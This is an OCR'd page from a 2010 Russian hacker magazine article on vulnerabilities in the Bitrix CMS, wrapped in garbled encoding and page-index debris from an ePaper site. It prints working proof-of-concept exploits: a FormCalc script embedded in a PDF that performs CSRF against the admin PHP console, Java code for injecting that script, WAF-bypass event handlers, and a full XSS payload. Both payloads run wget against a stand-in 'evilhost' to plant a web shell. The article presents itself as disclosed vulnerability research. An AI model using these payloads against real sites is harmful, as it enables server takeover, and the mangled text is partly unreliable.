JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online

More documents

Recommendations

Info

ВЗЛОМ Пример XSS, найденной на сайте SecurityLab.Ru Диалог подтверждения отправки запроса HTTP из PDF. Не высвечивается при отправке запроса на тот же домен, на котором расположен PDF var a = Get("http://targethost:6448/bitrix/admin/ user_admin.php?lang=ru") var sessid = (Substr(a,At(a,"sessid=")+7,32)) Post("http://targethost:6448/bitrix/admin/php_command_ line.php?mode=frame&lang=ru",Concat("sessid=",sessi d,"&query=system%28%27wget http://evilhost:6448/s. txt –O shell.php%27%29%3B"),"application/x-www-formurlencoded") Для создания PDF-документа можно было воспользоваться триальной версией Adobe Livecycle Designer (adobe.com/go/trylivecycle), но дистрибутив весил целых 3 Гб. Поэтому я решил скачать готовый PDF с каким-нибудь скриптом и просто заменить текст самого скрипта. Для работы с форматом PDF нашлась прекрасная бесплатная библиотека iText (itextpdf.com) под Java. Функция для замены скрипта в документе получилась такая: public static void replacePDFScript( String filename, String script) { try { PdfReader reader = new PdfReader(filename); XfaForm xfa = new XfaForm(reader); Document doc = xfa.getDomDocument(); NodeList list = doc.getElementsByTagName("script"); list.item(0).setTextContent(script); PdfStamper stamper = new PdfStamper(reader, new FileOutputStream(filename+"_mod.pdf")); xfa.setDomDocument(doc); xfa.setChanged(true); XfaForm.setXfa(xfa, stamper.getReader(), stamper.getWriter()); stamper.close(); } catch (Exception e) { e.printStackTrace(); } } Согласись, использовать сие всяко проще, чем скачивать 3 Гб платного софта. Теперь немного о том, что касается ограничений безопасности Adobe Acrobat на отправку запросов из документа. Сам PDFдокумент, ясное дело, может быть открыт как через ActiveX-компонент Adobe Acrobat в браузере, так и напрямую из локального файла в окне Acrobat’а. По умолчанию все запросы, которые посылает PDF-документ, требуют подтверждения со стороны пользователя. Высвечивается окно с предложением разрешить отправку запросов с домена, на котором расположен документ. Замечу, что ограничения именно для домена отправителя, а не как это принято обычно — для домена, куда осуществляется 068 запрос. Если же открывается локальный файл, то санкция устанавливается на имя файла, что, кстати, может быть использовано для атаки с подменой содержимого. Но вот если документ открыт через браузер, и запрос отправляется на тот же домен, на котором расположен документ, никаких ограничений безопасности не срабатывает! Такой вариант открытия документа и присутствовал в Битриксе на момент исследования. Собственно, на этом PoC-эксплоит был готов. Я зашел от имени нового пользователя в свой локальный Битрикс, на котором проводил эксперименты, создал заявку в модуле «техническая поддержка» и прикрепил к ней полученный PDF. Затем перелогинился от администратора и просмотрел заявку от пользователя, после чего открыл содержащийся в ней документ. На экране отобразился совершенно чистый белый лист, никаких предупреждений, никаких сообщений. Результат работы эксплойта красовался по адресу http://targethost:6448/bitrix/admin/shell.php. Получилась очень показательная демонстрация атаки CSRF, которая часто критически недооценивается разработчиками. Если строго подходить к классификации, уязвимость, конечно, не простая CSRF. Здесь злоумышленник может изменять заголовки HTTP-запроса, и главное — работать с ответом сервера. ÂÀÓ, WAF! Красивая реализация CSRF через PDF подстегнула проделать аналогичный трюк с помощью первой обнаруженной уязвимости XSS. Но для этого необходимо было обойти «проактивную защиту», которая уже была исправлена с момента моих последних раскопок (см. статью «Сказки XSSахеризады»). Тут было два вектора атаки — найти способ обхода фильтрации либо существующих выражений, либо не фильтруемых. Учитывая, что первый вектор я уже исследовал и показал на СС09, решил пробиваться по второму. Тут ничего нового не придумаешь, воспользовался методами, описанными в статье «Сказки XSSахеризады» и полез в документацию на броузерные HTML. 15 минут раскопок принесли плоды — под InternetExplorer нашлись два метода onmouseenter и onmouseleave. Это аналоги фильтруемых WAF исключений onmouseover, onmouseout. То, что доктор прописал :). Чтобы сделать атаку кроссбраузерной, пришлось еще немного порыться в документации... и в итоге нашелся интересный метод onselectstart, который работал и в IE, и в Chrome. Причем в случае с Chrome ивент срабатывает просто при клике, а для IE требуется еще провести по тексту, как при выделении. На этом этапе уже ничто не мешало осуществить второй вариант CSRF и, опять-таки, получить веб-шелл. К сожалению, день уже заканчивался, с момента начала исследования прошло семь часов, оформить все найденное в приличные advisory я уже не успевал, поэтому просто пошел спать. ÀÍÒÐÀÊÒ È ÒÐÅÒÈÉ ÀÊÒ Через несколько дней удалось снова выкроить время и вернуться к исследованию движка. Первым делом был написан advisory и отправлен разработчикам. Нехитрый список уязвимостей содержал CSRF via PDF, XSS в тэге [URL] и новые методы обхода WAF. Теперь надо было написать пример для заливки шелла через две уязвимости (XSS+WAF XÀÊÅÐ 09 /140/ 10
HTTP://WWW Фишинг-атака с использованием уязвимости bypass). Я знал, что WAF фильтрует не только ивенты, но и функции и переменные, которые он считает опасными, в самом JavaScript, и морально приготовился к мучительным видоизменениям кода. Логично, казалось бы, было использовать обфускатор jjencode. Но в данном случае он был неприменим из-за того, что любой символ закрывающейся квадратной скобки закрывал тэг URL, в котором была уязвимость, и отсекал весь остальной код за собой. Ну, а квадратные скобки встречаются в jjencode на каждом шагу. Поэтому пришлось идти другим путем. Логика эксплойта должна была быть следующей: 1. Создаем объекты iframe, form, два поля input (параметры POST sessid и query). 2. В iframe загружаем какую-нибудь страницу админки и получаем из него innerHTML. 3. Выдираем из innerHTML нашего iframe значение sessid. 4. Проставляем значение sessid в value атрибут первого объекта input. 5. Выполняем form.submit. Единственным, что мешало написанию эксплойта со стороны системы, была фильтрация метода onload. Конечно, можно было написать конструкцию типа i[“onload”]=a, но, опять-таки, квадратные скобки не были допустимы для данной уязвимости. Пришлось снова придумывать. Придумка оказалось простой, как валенок — setTimeout(a,10000). Рассчитано на то, что содержимое iframe загрузится раньше 10 секунд, функция a сможет выдрать значение sessid. В остальном никаких хитростей применено не было. Код получился вот такой: [URL=http://a' onmouseenter='var i=document. createElement("iframe");i.style. width="0px";i.style.height="0px";var p=/ sessid=.{32}/;var t="";var f=document. createElement("form");f.method="POST";f. action="/bitrix/admin/php_command_ line.php?mode=frame";var s=document. createElement("INPUT");s.style. visibility="hidden";s.type="text";s. name="sessid";var y=document. createElement("INPUT");y.style. visibility="hidden";y.type="text";y. name="query";y.value="system(\"wget htt\".\"p://evilhost:6448/s.txt -O s.php\");";f.appendChild(s);f. appendChild(y);function b(){t+=i. document.body.innerHTML.match(p);s. value=t.substr(7);f.submit()};i. src="/bitrix/admin/";document.body. appendChild(i);document.body.appendChild(f); setTimeout(b,10000);']ÍÀÂÅÄÈ ÍÀ ÌÅÍß![/URL] XÀÊÅÐ 09 /140/ 10 Веб-шелл, залитый на мой локальный Битрикс через CSRF У такого PoC есть два недостатка — он работает только под Internet Explorer и открывает новую страницу с результатом выполнения команды шелла (пустую, если все прошло хорошо, и шелл залился). Эти два недостатка с легкостью лечатся, но в этой статье более элегантного решения не будет дано специально. Моя цель — показать возможность проведения атаки, а не дать в руки готовый инструмент для взлома. ÑËÀÄÊÎÅ ÍÀ ÇÀÊÓÑÊÓ Итак, мне удалось провести две успешные атаки самого себя и залить два веб-шелла. В завершение исследования я еще раз оглядел весь движок, по большей части для того, чтобы просто изучить функционал. Случайно наведя мышкой на надписи с именем автора записи в блоге, я увидел, что при этом открывается всплывающее окно, в котором отображается само сообщение. Это выглядело очень красиво — дизайн окошка был оформлен под облачко из комиксов. Но меня насторожило, что в этом окошке выводится также значение поля ICQ из профиля пользователя. Причем при выводе не фильтруется ни < >, ни ‘ “. Как же просто было при сохранении в базу ограничить поле ICQ в профиле пользователя только цифрами! Это ведь так логично! Но вместо простого решения — уязвимость. Это была третья возможность заливки шелла. В отличие от варианта с [URL] здесь можно было разгуляться — jjencode и целые тэги, а не только атрибуты. Кроме того, можно использовать уязвимости XSS для фишинг-атак. Демонстрацию такой техники можно найти на картинке. Придумывать еще один метод обхода WAF для проведения атак без участия со стороны пользователя, таких как клики и наведения мышкой, мне уже не хотелось. Быстрое исследование, которое заняло полтора дня, решено было закончить, а обнаруженная уязвимость также ушла разработчикам. ÔÈÍÀË Все, что было обнаружено, уже должно быть исправлено в новом Битриксе на момент публикации этой статьи. Всегда до публикации следует оповещать разработчиков и согласовывать сроки публикации. Так и было сделано. Находить уязвимости и взламывать сайты — это две совершенно разные задачи. А если учесть масштабы распространения Битрикса в рунете — последствия атак могли бы быть весьма внушительными. Исследователь — не взломщик, он энтузиаст, стремится показать, где программа недоработана, и в итоге способствует тому, чтобы его продукт стал более защищен. На этом снимаю перед тобой шляпу и отклани ваюсь. И замечу (на всякий случай), что в ходе исследования ни один живой сайт не пострадал. Как всегда, на вопросы отвечаю в блоге oxod.ru. z links • Документация языка FormCalc — help.adobe.com/ en_US/livecycle/es/ FormCalc.pdf • Продукт Adobe Livecycle Designer, trial версия для создания PDF документов — adobe. com/go/trylivecycle • Общие сведения об атаке CSRF — owasp. org/index.php/Cross- Site_Request_Forgery_(CSRF) • Мой блог (отвечаю на вопросы, пишу по мере сил) — oxod.ru DVD dvd • На диске ты найдешь демонстрацию всех описанных уязвимостей 069
Page 1:
CMS БИТРИКС: СВЕЖИЕ У
Page 4 and 5:
CONTENT MegaNews 004 Все нов
Page 6:
MEGANEWS МАРИЯ «MIFRILL» Н
Page 10:
MEGANEWS ÏÈÙÅÂÀß ÖÅÏÎ×
Page 13 and 14:
Реклама 11
Page 15 and 16:
ÆÈÄÊÎÑÒÍÎÅ ÎÕËÀÆÄÅ
Page 17 and 18:
ÓÆÀÑ È ÏÀÍÈÊÀ — SKYPE
Page 19 and 20: ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒ
Page 21 and 22: 4500 ðóá. 11600 ðóá. 3Q 3QMMP
Page 24 and 25: FERRUM SEAGATE FREEAGENT Theater 35
Page 26 and 27: FERRUM Дмитрий Ленски
Page 28 and 29: PC_ZONE Александр Лозо
Page 30 and 31: PC_ZONE Перед сборкой
Page 32: PC_ZONE INFO info Если речь
Page 35 and 36: Моя первая разрабо
Page 37 and 38: У Poly-Poly Cannon было уже
Page 39 and 40: coding lotus.xakep.ru X-testing сo
Page 41 and 42: Сервисная утилита
Page 43 and 44: VID È PID ÍÅ ÈÇÂËÅÊÀÞÒ
Page 45 and 46: наша информация, та
Page 47 and 48: ¹ 6 РЕШЕНИЕ: ЗАДАЧА:
Page 50 and 51: ВЗЛОМ Алексей Синц
Page 52 and 53: ВЗЛОМ Ubuntu. Шаг 1 Ubuntu.
Page 54 and 55: ВЗЛОМ Clickjacking. Вроде
Page 58 and 59: ВЗЛОМ Статистика о
Page 60 and 61: ВЗЛОМ Леонид «Cr@wler»
Page 62 and 63: ВЗЛОМ Китайский ма
Page 64 and 65: ВЗЛОМ Баранов Арте
Page 66 and 67: ВЗЛОМ Команда !vad да
Page 68 and 69: ВЗЛОМ Владимир d0znp
Page 74 and 75: ВЗЛОМ 0xXXYY0104 — нача
Page 76 and 77: ВЗЛОМ Так выглядит
Page 78 and 79: ВЗЛОМ HellMilitia и my Death
Page 80 and 81: ВЗЛОМ Смещение фай
Page 82 and 83: ВЗЛОМ Маг icq 884888 X-TOOL
Page 84 and 85: MALWARE Вячеслав Закор
Page 86 and 87: MALWARE На этом первую
Page 88 and 89: MALWARE Александр Экке
Page 90: MALWARE невыявляем пут
Page 93 and 94: ËÀÁÎÐÀÒÎÐÈß Ñ ÄÐÓÃ
Page 95 and 96: достают через АНБ.
Page 97 and 98: Реклама
Page 99 and 100: Команда «qdbus org.kde.yaku
Page 101 and 102: ли, то не могу преду
Page 103 and 104: Antix LXDE + Ubuntu = Lubuntu 128
Page 105 and 106: Slitaz Åñòü ëè æèçíü â
Page 107 and 108: coding DVD Qt logo dvd На дис
Page 109 and 110: coding Наше приложени
Page 111 and 112: coding позволяющие оп
Page 113 and 114: coding Утилита ручной
Page 115 and 116: Особо чувствительн
Page 117 and 118: Реклама
Page 119 and 120: îáíîâëåíèÿ — íàæàò
Page 121 and 122:
INFO info • Обзор Forefront
Page 123 and 124:
XSTARTER Åùå îäíà ïîïóë
Page 125 and 126:
INFO info • Все програм
Page 127 and 128:
Евгений Зобнин j1m@syn
Page 129 and 130:
Создаем виртуальны
Page 131 and 132:
Устанавливаем зону
Page 133 and 134:
Lite, Pro èëè Cluster. Ñïèñ
Page 135 and 136:
Â çàâèñèìîñòè îò âû
Page 137 and 138:
Во сне мы проводим
Page 139 and 140:
INFO info Подробнее об
Page 141 and 142:
ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•
Page 143 and 144:
Wi-Fi сканер, но наибо
Page 145 and 146:
CMS БИТРИКС: СВЕЖИЕ У
show all

JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online